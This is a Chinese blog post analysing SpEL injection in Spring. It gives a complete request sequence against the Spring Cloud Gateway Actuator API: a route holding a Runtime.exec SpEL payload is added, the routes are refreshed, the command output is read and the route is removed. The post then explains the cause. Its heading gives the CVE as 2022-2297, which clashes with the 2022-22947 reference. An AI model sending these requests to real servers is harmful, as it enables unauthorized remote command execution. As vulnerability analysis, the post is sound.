Spel注入漏洞分析

B1ackMa9ic

于 2024-09-03 09:59:08 发布

阅读量610

点赞数 15

文章标签： spring boot spring 安全网络安全安全架构

本文链接：https://blog.csdn.net/qq_50296568/article/details/141800668

版权

文章目录

SPEL注入
SPEL漏洞案例
- CVE-2022-2297
- - EXP

SPEL注入

SPEL是Spring框架中的一种表达式语言，用于在Spring配置中动态计算值。它提供了一种简洁的语法，用于访问和操作对象的属性、调用方法、进行数学计算、逻辑运算等。允许开发者在Spring应用程序中以动态和灵活的方式操作和配置bean，增强了配置的可读性和动态性。而SPEL注入漏洞是针对的是 Spring 框架中使用表达式语言的模块。由于SPEL被广泛应用于构建动态表达式，许多组件和功能依赖于它，包括但不限于：

模块	详情
Spring Security	在安全控制中，SPEL常被用来定义访问控制规则。攻击者可能试图通过操纵输入来执行未授权的操作。
Spring MVC	在Spring MVC中，SPEL可以用于控制器的方法参数和视图模型的构建，攻击者可以注入恶意表达式来操控控制器逻辑或数据。
Spring Context	SPEL也可以在上下文中用于属性注入，恶意用户可以尝试注入表达式来访问或修改容器中的 Bean 属性。
Spring Data	在Spring Data的查询和实体映射中，SPEL可能被用来动态构建查询，攻击者利用此点注入不必要的查询逻辑。

SPEL漏洞案例

CVE-2022-2297

EXP

使用以下数据包注入包含恶意SpEL表达式的路由

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

在这里插入图片描述
发送如下数据包应用刚添加的路由。
这个数据包将触发SpEL表达式的执行：

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述

发送如下数据包即可查看执行结果：

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述

最后，发送如下数据包清理现场，删除所添加的路由：

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

在这里插入图片描述

再刷新下路由：

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

漏洞原理
SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext：

SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别，公开SpEL语言特性和配置选项的子集。
StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。
SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集，不包括 Java类型引用、构造函数和bean引用；而StandardEvaluationContext是支持全部SpEL语法的。
SpEL表达式是可以操作类及其方法的，可以通过类类型表达式T(Type)来调用任意类方法。这是因为在不指定EvaluationContext的情况下默认采用的是StandardEvaluationContext，而它包含了SpEL的所有功能，在允许用户控制输入的情况下可以成功造成任意命令执行。

#参考
Spel表达式漏洞总结
 Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）

B1ackMa9ic

关注

15
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
Spel注入漏洞分析

而SPEL注入漏洞是针对的是 Spring 框架中使用表达式语言的模块。这是因为在不指定EvaluationContext的情况下默认采用的是StandardEvaluationContext，而它包含了SpEL的所有功能，在允许用户控制输入的情况下可以成功造成任意命令执行。SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别，公开SpEL语言特性和配置选项的子集。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。
复制链接

扫一扫